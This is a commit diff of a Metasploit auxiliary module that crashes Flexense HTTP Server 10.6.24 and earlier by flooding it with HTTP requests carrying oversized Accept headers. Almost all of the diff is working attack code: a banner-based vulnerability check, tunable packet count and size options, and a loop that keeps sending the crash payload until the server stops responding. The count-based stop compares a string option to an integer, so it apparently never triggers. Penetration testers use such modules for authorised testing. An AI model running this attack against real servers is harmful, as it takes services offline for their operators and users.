Refined packet sizes and counts, improved error messages
parent
3ab7526786
commit
026b22d061
|
@ -12,7 +12,9 @@ class MetasploitModule < Msf::Auxiliary
|
|||
'Name' => 'Flexense HTTP Server Denial Of Service',
|
||||
'Description' => %q{
|
||||
This module triggers a Denial of Service vulnerability in the Flexense HTTP server.
|
||||
Vulnerability caused by a user mode write access memory violation and can be triggered with rapidly sending variety of HTTP requests with long HTTP header values.
|
||||
Vulnerability caused by a user mode write access memory violation and can be triggered with
|
||||
rapidly sending variety of HTTP requests with long HTTP header values.
|
||||
|
||||
Multiple Flexense applications that are using Flexense HTTP server 10.6.24 and below vesions reportedly vulnerable.
|
||||
},
|
||||
'Author' => [ 'Ege Balci <ege.balci@invictuseurope.com>' ],
|
||||
|
@ -27,6 +29,8 @@ class MetasploitModule < Msf::Auxiliary
|
|||
register_options(
|
||||
[
|
||||
Opt::RPORT(80),
|
||||
OptString.new('PacketCount', [ true, "The number of packets to be sent (Recommended: Above 1725)" , 1725 ]),
|
||||
OptString.new('PacketSize', [ true, "The number of bytes in the Accept header (Recommended: 4088-5090" , rand(4088..5090) ])
|
||||
])
|
||||
|
||||
end
|
||||
|
@ -37,39 +41,51 @@ class MetasploitModule < Msf::Auxiliary
|
|||
sock.put("GET / HTTP/1.0\r\n\r\n")
|
||||
res = sock.get
|
||||
if res and res.include? 'Flexense HTTP Server v10.6.24'
|
||||
Exploit::CheckCode::Vulnerable
|
||||
Exploit::CheckCode::Appears
|
||||
else
|
||||
Exploit::CheckCode::Unknown
|
||||
Exploit::CheckCode::Safe
|
||||
end
|
||||
rescue Rex::ConnectionRefused
|
||||
print_error("Target refused the connection")
|
||||
Exploit::CheckCode::Unknown
|
||||
rescue
|
||||
print_error("Target did not respond to HTTP request")
|
||||
Exploit::CheckCode::Unknown
|
||||
end
|
||||
end
|
||||
|
||||
def run
|
||||
unless check == Exploit::CheckCode::Vulnerable
|
||||
unless check == Exploit::CheckCode::Appears
|
||||
fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
|
||||
end
|
||||
|
||||
print_status('Triggering the vulnerability')
|
||||
size = datastore['PacketSize'].to_i
|
||||
print_status("Starting with packets of #{size}-byte strings")
|
||||
|
||||
count = 0
|
||||
loop do
|
||||
payload = ""
|
||||
payload << "GET /"+('A'*rand(8000))+" HTTP/0.9\n"
|
||||
payload << "Host: 127.0.0.1\n"
|
||||
payload << "User-Agent: Mozilla"+('A'*rand(8000))+"\n"
|
||||
payload << "Accept: "+('A'*rand(8000))+"\r\n\r\n"
|
||||
payload << "GET /" + Rex::Text.rand_text_alpha(rand(30)) + " HTTP/1.1\r\n"
|
||||
payload << "Host: 127.0.0.1\r\n"
|
||||
payload << "Accept: "+('A' * size)+"\r\n"
|
||||
payload << "\r\n\r\n"
|
||||
begin
|
||||
connect
|
||||
sock.put(payload)
|
||||
disconnect
|
||||
count += 1
|
||||
break if count==datastore['PacketCount']
|
||||
rescue ::Rex::InvalidDestination
|
||||
print_error('Invalid destination! Continuing...')
|
||||
rescue ::Rex::ConnectionTimeout
|
||||
print_error('Connection timeout !')
|
||||
print_error('Connection timeout! Continuing...')
|
||||
rescue ::Errno::ECONNRESET
|
||||
print_error('Connection reset !')
|
||||
print_error('Connection reset! Continuing...')
|
||||
rescue ::Rex::ConnectionRefused
|
||||
print_good("DoS successful #{rhost} is down !")
|
||||
break
|
||||
print_good("DoS successful after #{count} packets with #{size}-byte headers")
|
||||
return true
|
||||
end
|
||||
end
|
||||
print_error("DoS failed after #{count} packets of #{size}-byte strings")
|
||||
end
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue